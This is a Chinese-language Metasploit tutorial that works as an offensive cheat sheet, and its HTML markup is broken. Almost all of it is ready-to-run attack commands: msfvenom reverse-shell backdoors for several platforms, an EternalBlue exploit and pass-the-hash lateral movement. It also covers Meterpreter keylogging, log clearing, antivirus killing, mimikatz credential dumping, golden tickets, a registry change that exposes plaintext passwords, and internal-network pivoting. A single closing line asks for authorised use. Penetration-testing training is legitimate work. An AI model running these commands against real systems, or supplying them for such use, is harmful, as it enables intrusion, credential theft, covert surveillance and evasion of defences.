Metasploit Framework (MSF) 从入门到精通指南<\/h1>

一、MSF基础介绍<\/h2>
Metasploit Framework (简称MSF) 是全球最受欢迎的渗透测试框架，其强大之处在于：<\/p>
漏洞利用框架，允许开发自己的漏洞脚本<\/li>
包含大量现成的渗透攻击模块<\/li>
提供后渗透测试工具集<\/li>
支持多平台攻击载荷生成<\/li> <\/ul>
二、MSF基础配置与命令<\/h2>

1. 启动与数据库配置<\/h3>
# 启动MSF控制台<\/span>
<\/span><\/span>msfconsole
<\/span><\/span>
<\/span><\/span># 数据库配置<\/span>
<\/span><\/span>service postgresql start  # 启动数据库<\/span>
<\/span><\/span>msfdb init               # 初始化数据库<\/span>
<\/span><\/span>msfconsole db_status     # 查看连接状态<\/span>
<\/span><\/span>msfconsole db_rebuild_cache # 建立数据库缓存<\/span>
<\/span><\/span>
<\/span><\/span># 若连接问题<\/span>
<\/span><\/span>msfdb start             # 启动数据库服务<\/span>
<\/span><\/span>netstat -pantu | grep 5432<\/span> # 查看端口<\/span>
<\/span><\/span><\/code><\/pre>2. 常用基础命令<\/h3>
show exploits      # 查看所有渗透攻击模块<\/span>
<\/span><\/span>show auxiliary     # 查看所有辅助模块<\/span>
<\/span><\/span>show options       # 查看模块选项<\/span>
<\/span><\/span>show payloads      # 查看适用载荷<\/span>
<\/span><\/span>show targets       # 查看适用目标类型<\/span>
<\/span><\/span>search <关键词>    # 搜索模块<\/span>
<\/span><\/span>info <模块名>      # 显示模块详细信息<\/span>
<\/span><\/span>use <模块名>       # 使用模块<\/span>
<\/span><\/span>back               # 返回上级<\/span>
<\/span><\/span>
<\/span><\/span># 参数设置<\/span>
<\/span><\/span>set <参数> <值>    # 设置模块参数<\/span>
<\/span><\/span>setg <参数> <值>   # 设置全局参数<\/span>
<\/span><\/span>unset\/unsetg       # 取消设置<\/span>
<\/span><\/span>save               # 保存当前设置<\/span>
<\/span><\/span><\/code><\/pre>3. 核心命令<\/h3>
sessions          # 管理会话<\/span>
<\/span><\/span>color             # 切换颜色<\/span>
<\/span><\/span>connect           # 连接主机<\/span>
<\/span><\/span>exit\/quit         # 退出控制台<\/span>
<\/span><\/span>sleep             # 暂停执行<\/span>
<\/span><\/span>get\/getg          # 获取变量值<\/span>
<\/span><\/span>spool             # 记录控制台输出<\/span>
<\/span><\/span>threads           # 管理后台线程<\/span>
<\/span><\/span>history           # 查看命令历史<\/span>
<\/span><\/span>load              # 加载插件<\/span>
<\/span><\/span>unload            # 卸载插件<\/span>
<\/span><\/span>version           # 显示版本<\/span>
<\/span><\/span>route             # 路由流量<\/span>
<\/span><\/span><\/code><\/pre>三、MSFVenom载荷生成<\/h2>
1. 主要参数<\/h3>
-p <payload>      # 指定payload<\/span>
<\/span><\/span>-e <编码器>       # 指定编码器(用于免杀)<\/span>
<\/span><\/span>-i <次数>         # 编码迭代次数<\/span>
<\/span><\/span>-b <坏字符>       # 去掉坏字符<\/span>
<\/span><\/span>LHOST\/LPORT       # 监听IP和端口<\/span>
<\/span><\/span>-f <格式>         # 输出格式(exe,elf等)<\/span>
<\/span><\/span>-o <文件名>       # 输出文件<\/span>
<\/span><\/span>-l                # 列出可用payload<\/span>
<\/span><\/span><\/code><\/pre>2. 生成各类后门示例<\/h3>
# Linux<\/span>
<\/span><\/span>msfvenom -p linux\/x86\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f elf > shell.elf
<\/span><\/span>
<\/span><\/span># Windows<\/span>
<\/span><\/span>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f exe > shell.exe
<\/span><\/span>
<\/span><\/span># Mac<\/span>
<\/span><\/span>msfvenom -p osx\/x86\/shell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f macho > shell.macho
<\/span><\/span>
<\/span><\/span># Web相关<\/span>
<\/span><\/span>msfvenom -p php\/meterpreter_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.php
<\/span><\/span>msfvenom -p java\/jsp_shell_reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f war > shell.war
<\/span><\/span>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span><IP> LPORT=<\/span><Port> -f asp > shell.asp
<\/span><\/span>
<\/span><\/span># 脚本类<\/span>
<\/span><\/span>msfvenom -p cmd\/unix\/reverse_python LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.py
<\/span><\/span>msfvenom -p cmd\/unix\/reverse_bash LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.sh
<\/span><\/span>msfvenom -p cmd\/unix\/reverse_perl LHOST=<\/span><IP> LPORT=<\/span><Port> -f raw > shell.pl
<\/span><\/span><\/code><\/pre>3. 设置监听<\/h3>
use exploit\/multi\/handler
<\/span><\/span>set payload windows\/x64\/meterpreter\/reverse_tcp
<\/span><\/span>show options
<\/span><\/span>set LHOST <IP>
<\/span><\/span>set LPORT <Port>
<\/span><\/span>set ExitOnSession false  # 保持连接<\/span>
<\/span><\/span>exploit  # 开始监听<\/span>
<\/span><\/span><\/code><\/pre>4. 会话管理<\/h3>
jobs            # 查看后台任务<\/span>
<\/span><\/span>kill <id>       # 停止任务<\/span>
<\/span><\/span>sessions -l     # 查看会话<\/span>
<\/span><\/span>sessions <id>   # 选择会话<\/span>
<\/span><\/span>sessions -k <id> # 结束会话<\/span>
<\/span><\/span>background      # 会话放到后台<\/span>
<\/span><\/span>Ctrl+z          # 后台当前会话<\/span>
<\/span><\/span>Ctrl+c          # 结束当前会话<\/span>
<\/span><\/span><\/code><\/pre>四、Meterpreter后渗透<\/h2>
1. 常用命令<\/h3>
help            # 帮助菜单<\/span>
<\/span><\/span>background      # 后台当前会话<\/span>
<\/span><\/span>exit            # 退出会话<\/span>
<\/span><\/span>irb             # 进入Ruby脚本模式<\/span>
<\/span><\/span>migrate <PID>   # 迁移到其他进程<\/span>
<\/span><\/span>sysinfo         # 系统信息<\/span>
<\/span><\/span>getuid          # 当前用户权限<\/span>
<\/span><\/span>getsystem       # 提权到SYSTEM<\/span>
<\/span><\/span><\/code><\/pre>2. 文件系统操作<\/h3>
cat <文件>      # 查看文件<\/span>
<\/span><\/span>cd              # 切换目录<\/span>
<\/span><\/span>del\/rm          # 删除文件<\/span>
<\/span><\/span>download <远程> <本地> # 下载文件<\/span>
<\/span><\/span>upload <本地> <远程> # 上传文件<\/span>
<\/span><\/span>edit            # 编辑文件(Vim)<\/span>
<\/span><\/span>getlwd\/lpwd     # 本地工作目录<\/span>
<\/span><\/span>getwd\/pwd       # 远程工作目录<\/span>
<\/span><\/span>lcd             # 切换本地目录<\/span>
<\/span><\/span>ls              # 列出文件<\/span>
<\/span><\/span>mkdir           # 创建目录<\/span>
<\/span><\/span>rmdir           # 删除目录<\/span>
<\/span><\/span>search          # 搜索文件<\/span>
<\/span><\/span><\/code><\/pre>3. 网络操作<\/h3>
ipconfig       # 网络配置信息<\/span>
<\/span><\/span>portfwd        # 端口转发<\/span>
<\/span><\/span>route          # 路由表操作<\/span>
<\/span><\/span><\/code><\/pre>4. 系统操作<\/h3>
clearev        # 清除日志<\/span>
<\/span><\/span>execute        # 执行命令<\/span>
<\/span><\/span>getpid         # 当前进程ID<\/span>
<\/span><\/span>kill <PID>     # 终止进程<\/span>
<\/span><\/span>ps             # 进程列表<\/span>
<\/span><\/span>reboot         # 重启系统<\/span>
<\/span><\/span>reg            # 注册表操作<\/span>
<\/span><\/span>shutdown       # 关闭系统<\/span>
<\/span><\/span>shell          # 获取系统shell<\/span>
<\/span><\/span><\/code><\/pre>5. 用户界面操作<\/h3>
enumdesktops   # 列出可用桌面<\/span>
<\/span><\/span>getdesktop     # 获取当前桌面<\/span>
<\/span><\/span>screenshot     # 屏幕截图<\/span>
<\/span><\/span>keyscan_start  # 键盘记录开始<\/span>
<\/span><\/span>keyscan_stop   # 键盘记录停止<\/span>
<\/span><\/span>keyscan_dump   # 导出键盘记录<\/span>
<\/span><\/span>uictl          # 用户界面控制<\/span>
<\/span><\/span><\/code><\/pre>6. 密码相关<\/h3>
hashdump       # 导出密码哈希<\/span>
<\/span><\/span>run post\/windows\/gather\/smart_hashdump # 智能导出哈希<\/span>
<\/span><\/span>load kiwi      # 加载mimikatz功能<\/span>
<\/span><\/span>creds_all      # 获取所有凭据<\/span>
<\/span><\/span><\/code><\/pre>五、内网渗透实战<\/h2>
1. 永恒之蓝(MS17-010)攻击<\/h3>
use exploit\/windows\/smb\/ms17_010_eternalblue
<\/span><\/span>set payload windows\/x64\/meterpreter\/reverse_tcp
<\/span><\/span>set RHOSTS <目标IP>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>2. 密码哈希抓取与利用<\/h3>
# 抓取哈希<\/span>
<\/span><\/span>hashdump
<\/span><\/span>run post\/windows\/gather\/smart_hashdump
<\/span><\/span>
<\/span><\/span># 使用psexec横向移动<\/span>
<\/span><\/span>use exploit\/windows\/smb\/psexec
<\/span><\/span>set SMBUser Administrator
<\/span><\/span>set SMBPass <哈希>
<\/span><\/span>set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>set RHOSTS <目标IP>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>3. 远程桌面控制<\/h3>
# 开启RDP<\/span>
<\/span><\/span>run post\/windows\/manage\/enable_rdp
<\/span><\/span>run getgui -e
<\/span><\/span>
<\/span><\/span># 添加用户<\/span>
<\/span><\/span>run getgui -u <用户名> -p <密码>
<\/span><\/span>
<\/span><\/span># 端口转发(若3389被拦截)<\/span>
<\/span><\/span>portfwd add -l <本地端口> -p 3389<\/span> -r <目标IP>
<\/span><\/span>rdesktop 127.0.0.1:<本地端口>
<\/span><\/span><\/code><\/pre>4. 内网路由与代理<\/h3>
# 获取内网网段<\/span>
<\/span><\/span>run get_local_subnets
<\/span><\/span>
<\/span><\/span># 添加路由<\/span>
<\/span><\/span>run autoroute -s <内网网段>\/24
<\/span><\/span>route add <内网网段> <掩码> <会话ID>
<\/span><\/span>run autoroute -p
<\/span><\/span>
<\/span><\/span># 设置socks代理<\/span>
<\/span><\/span>use auxiliary\/server\/socks_proxy
<\/span><\/span>set SRVHOST 0.0.0.0
<\/span><\/span>set SRVPORT <端口>
<\/span><\/span>run
<\/span><\/span>
<\/span><\/span># 配置proxychains<\/span>
<\/span><\/span>编辑\/etc\/proxychains.conf
<\/span><\/span>添加 socks5 <IP> <端口>
<\/span><\/span><\/code><\/pre>六、自动化攻击<\/h2>
1. 安装db_autopwn<\/h3>
cd \/usr\/share\/metasploit-framework\/plugins
<\/span><\/span>git clone https:\/\/github.com\/hahwul\/metasploit-db_autopwn.git
<\/span><\/span>cd metasploit-db_autopwn\/
<\/span><\/span>mv db_autopwn.rb \/usr\/share\/metasploit-framework\/plugins\/
<\/span><\/span>load db_autopwn
<\/span><\/span><\/code><\/pre>2. 浏览器自动化攻击<\/h3>
use auxiliary\/server\/browser_autopwn
<\/span><\/span>set LHOST <IP>
<\/span><\/span>set SRVPORT <端口>
<\/span><\/span>set URIPATH \/
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>七、域渗透技术<\/h2>
1. 域信息收集<\/h3>
run post\/windows\/gather\/enum_logged_on_users  # 登录用户<\/span>
<\/span><\/span>run post\/windows\/gather\/enum_ad_groups        # 组信息<\/span>
<\/span><\/span>run post\/windows\/gather\/enum_domain           # 定位域控<\/span>
<\/span><\/span>run post\/windows\/gather\/enum_ad_computers     # 域内机器<\/span>
<\/span><\/span>run post\/windows\/gather\/enum_patches          # 补丁信息<\/span>
<\/span><\/span>run post\/multi\/recon\/local_exploit_suggester  # 漏洞识别<\/span>
<\/span><\/span><\/code><\/pre>2. Kerberos用户名枚举<\/h3>
use auxiliary\/gather\/kerberos_enumusers
<\/span><\/span>set DOMAIN <域名>
<\/span><\/span>set RHOSTS <域控IP>
<\/span><\/span>set USER_FILE <用户名字典>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>八、实用模块<\/h2>
1. 扫描模块<\/h3>
auxiliary\/scanner\/discovery\/arp_sweep       # ARP扫描<\/span>
<\/span><\/span>auxiliary\/scanner\/portscan\/tcp              # TCP端口扫描<\/span>
<\/span><\/span>auxiliary\/scanner\/smb\/smb_version           # SMB服务识别<\/span>
<\/span><\/span>auxiliary\/scanner\/ssh\/ssh_version           # SSH服务识别<\/span>
<\/span><\/span>auxiliary\/scanner\/mssql\/mssql_schemadump    # MSSQL识别<\/span>
<\/span><\/span>auxiliary\/scanner\/rdp\/rdp_scanner           # RDP服务识别<\/span>
<\/span><\/span><\/code><\/pre>2. 后渗透模块<\/h3>
post\/windows\/manage\/migrate          # 进程迁移<\/span>
<\/span><\/span>post\/windows\/gather\/checkvm         # 检测虚拟机<\/span>
<\/span><\/span>post\/windows\/manage\/killav          # 关闭杀毒软件<\/span>
<\/span><\/span>post\/windows\/gather\/enum_applications # 应用程序枚举<\/span>
<\/span><\/span>post\/windows\/gather\/credentials\/windows_autologin # 自动登录凭证<\/span>
<\/span><\/span>post\/windows\/gather\/enum_domain_tokens # 域token查找<\/span>
<\/span><\/span><\/code><\/pre>九、高级技巧<\/h2>
1. Mimikatz集成(Kiwi模块)<\/h3>
load kiwi
<\/span><\/span>kiwi_cmd <mimikatz命令>  # 执行mimikatz命令<\/span>
<\/span><\/span>lsa_dump_sam            # dump SAM<\/span>
<\/span><\/span>lsa_dump_secrets        # dump LSA secrets<\/span>
<\/span><\/span>dcsync                  # 通过DCSync获取账户信息<\/span>
<\/span><\/span>golden_ticket_create    # 创建黄金票据<\/span>
<\/span><\/span><\/code><\/pre>2. 获取明文密码技巧<\/h3>
# 修改注册表允许明文缓存<\/span>
<\/span><\/span>reg add HKLM\S<\/span>YSTEM\C<\/span>urrentControlSet\C<\/span>ontrol\S<\/span>ecurityProviders\W<\/span>Digest \/v UseLogonCredential \/t REG_DWORD \/d 1<\/span> \/f
<\/span><\/span>
<\/span><\/span># 需要用户重新登录后<\/span>
<\/span><\/span>load kiwi
<\/span><\/span>creds_all
<\/span><\/span><\/code><\/pre>3. 跨路由访问<\/h3>
# 获取内网网段<\/span>
<\/span><\/span>run get_local_subnets
<\/span><\/span>
<\/span><\/span># 添加路由<\/span>
<\/span><\/span>run autoroute -s <内网网段>\/24
<\/span><\/span>route add <网段> <掩码> <会话ID>
<\/span><\/span>
<\/span><\/span># 设置socks代理<\/span>
<\/span><\/span>use auxiliary\/server\/socks_proxy
<\/span><\/span>set SRVHOST 0.0.0.0
<\/span><\/span>set SRVPORT <端口>
<\/span><\/span>run
<\/span><\/span>
<\/span><\/span># 使用proxychains访问内网<\/span>
<\/span><\/span>proxychains nmap -p- -sT <内网IP>
<\/span><\/span><\/code><\/pre>通过掌握以上MSF技术，您将能够进行从初始入侵到内网横向移动的完整渗透测试流程。请务必在合法授权范围内使用这些技术。<\/p>